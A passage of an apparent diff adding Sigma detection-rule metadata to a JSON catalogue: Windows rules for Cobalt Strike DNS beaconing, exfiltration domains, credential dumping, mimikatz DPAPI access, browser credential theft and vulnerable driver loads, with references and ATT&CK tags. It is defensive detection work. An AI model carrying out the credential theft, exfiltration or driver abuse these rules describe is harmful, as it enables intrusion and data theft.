"logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppInstaller Attempts From URL by DNS" + }, + { + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/09", + "falsepositive": [ 
+ "Unknown" + ], + "filename": "dns_query_win_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "value": "Suspicious Cobalt Strike DNS Beaconing" + }, + { + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "meta": { + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Mega upload" + ], + "filename": "dns_query_win_mega_nz.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "value": "DNS Query for MEGA.io Upload Domain" + }, + { + "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. 
(DNS-record will saved in host cache for a while TTL).", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": "No established falsepositives", + "filename": "dns_query_win_possible_dns_rebinding.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189" + ] + }, + "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", + "value": "Possible DNS Rebinding" + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_regsvr32_network_activity.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", + "value": "Regsvr32 Network Activity - DNS" + }, + { + "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", + "meta": { + "author": "Brandon George (blog post), Thomas Patzke (rule)", + "creation_date": "2021/07/08", + "falsepositive": [ + "Legitimate usage of ip lookup services such as ipify API" + ], + "filename": 
"dns_query_win_susp_ipify.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://twitter.com/neonprimetime/status/1436376497980428318", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1590" + ] + }, + "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "value": "Suspicious DNS Query for IP Lookup Service APIs" + }, + { + "description": "Detect suspicious LDAP request from non-Windows application", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Programs that also lookup the observed domain" + ], + "filename": "dns_query_win_susp_ldap.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "value": "Suspicious LDAP Domain Access" + }, + { + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/30", + "falsepositive": [ + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" + ], + "filename": "dns_query_win_susp_teamviewer.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.teamviewer.com/en-us/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", + "value": "Suspicious TeamViewer Domain Access" + }, + { + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "meta": { + "author": "frack113", + "creation_date": "2022/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_tor_onion.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ] + }, + "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "value": "Query Tor Onion Address" + }, + { + "description": "Detects DNS queries for subdomains used for upload to ufile.io", + "meta": { + "author": "yatinwad and TheDFIRReport", + "creation_date": "2022/06/23", + "falsepositive": [ + "Legitimate Ufile upload" + ], + "filename": "dns_query_win_ufile_io.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "value": "DNS Query for Ufile.io Upload Domain" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential 
dumping tool for password recovery" + ], + "filename": "driver_load_mal_creddumper.yml", + "level": "critical", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "value": "Credential Dumping Tools Service Execution" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "level": "critical", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": 
"driver_load_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "value": "PowerShell Scripts Run by a Services" + }, + { + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/16", + "falsepositive": [ + "Legitimate user of process hacker or system informer by low level developers or system administrators" + ], + "filename": "driver_load_process_hacker.yml", + "level": "medium", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "value": "Process Hacker and System Informer Driver Load" + }, + { + "description": "Detects a driver load from a temporary directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/12", + "falsepositive": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "filename": "driver_load_susp_temp_use.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml" + ], + "tags": [ + 
"attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "value": "Suspicious Driver Load from Temp" + }, + { + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7c676970-af4f-43c8-80af-ec9b49952852", + "value": "Vulnerable AVAST Anti Rootkit Driver Load" + }, + { + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/05", + "falsepositive": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "filename": "driver_load_vuln_dell_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "value": "Vulnerable Dell BIOS Update Driver Load" + }, + { + "description": "Detects 
the load of known vulnerable drivers by hash value", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_drivers.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://github.com/tandasat/ExploitCapcom", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "value": "Vulnerable Driver Load" + }, + { + "description": "Detects the load of known 
vulnerable drivers via their names only.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/03", + "falsepositive": [ + "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" + ], + "filename": "driver_load_vuln_drivers_names.yml", + "level": "medium", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "value": "Vulnerable Driver Load By Name" + }, + { + "description": "Detects the load of a signed and 
vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/25", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_gigabyte_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://twitter.com/malmoeb/status/1551449425842786306", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "value": "Vulnerable GIGABYTE Driver Load" + }, + { + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "driver_load_vuln_hevd_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "295c9289-acee-4503-a571-8eacaef36b28", + "value": "Vulnerable HackSys Extreme Vulnerable 
Driver Load" + }, + { + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_hw_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "value": "Vulnerable HW Driver Load" + }, + { + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate driver loads (old driver that didn't receive an update)" + ], + "filename": "driver_load_vuln_lenovo_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "value": "Vulnerable Lenovo Driver Load" + }, + { + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + 
"meta": { + "author": "Florian Roth", + "creation_date": "2022/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_winring0_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "value": "Vulnerable WinRing0 Driver Load" + }, + { + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/30", + "falsepositive": [ + "Legitimate WinDivert driver usage" + ], + "filename": "driver_load_windivert.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://reqrypt.org/windivert-doc.html", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml" + ], + "tags": [ + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" + ] + }, + "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", + "value": "WinDivert Driver Load" + }, + { + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "meta": { + "author": "frack113", + "creation_date": "2022/04/09", + "falsepositive": [ + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Software installed on other partitions other than \"C:\\\"", + "Searching software such as 
\"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + ], + "filename": "file_access_win_browser_credential_stealing.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ] + }, + "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "value": "Browser Credential Store Access" + }, + { + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/11", + "falsepositive": [ + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." 
+ ], + "filename": "file_access_win_credential_manager_stealing.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ] + }, + "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "value": "Credential Manager Access" + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "file_access_win_dpapi_master_key_access.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", + "value": "Suspicious Access To Windows DPAPI Master Keys" + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "file_access_win_susp_cred_hist_access.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "value": "Suspicious Access To Windows Credential History File" + }, + { + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/12", + "falsepositive": [ + "Changes made to or by the local NTP service" + ], + "filename": "file_change_win_2022_timestomping.yml", + "level": "high", + "logsource.category": "file_change", + "logsource.product": "windows", + "refs": [ + "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + ], + "tags": [ + "attack.t1070.006", + "attack.defense_evasion" + ] + }, + "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "value": "File Creation Date Changed to Another Year" + }, + { + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 
(SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_change_win_unusual_modification_by_dns_exe.yml", + "level": "high", + "logsource.category": "file_change", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "value": "Unusual File Modification by dns.exe" + }, + { + "description": "Detect DLL deletions from Spooler Service driver folder", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ] + }, + "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "value": "Windows Spooler Service Suspicious File Deletion" + }, + { + "description": "Deletion of log files is a known anti-forensic technique", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_delete_appli_log.yml", + "level": "low", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", + "value": "Delete Log from Application" + }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitime usage" + ], + "filename": "file_delete_win_delete_backup_file.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "value": "Deletes Backup Files" + }, + { + "description": "Detects the deletion of a prefetch file (AntiForensic)", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_delete_prefetch.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "value": "Prefetch File Deletion" + }, + { + "description": "Detects the deletion of the 
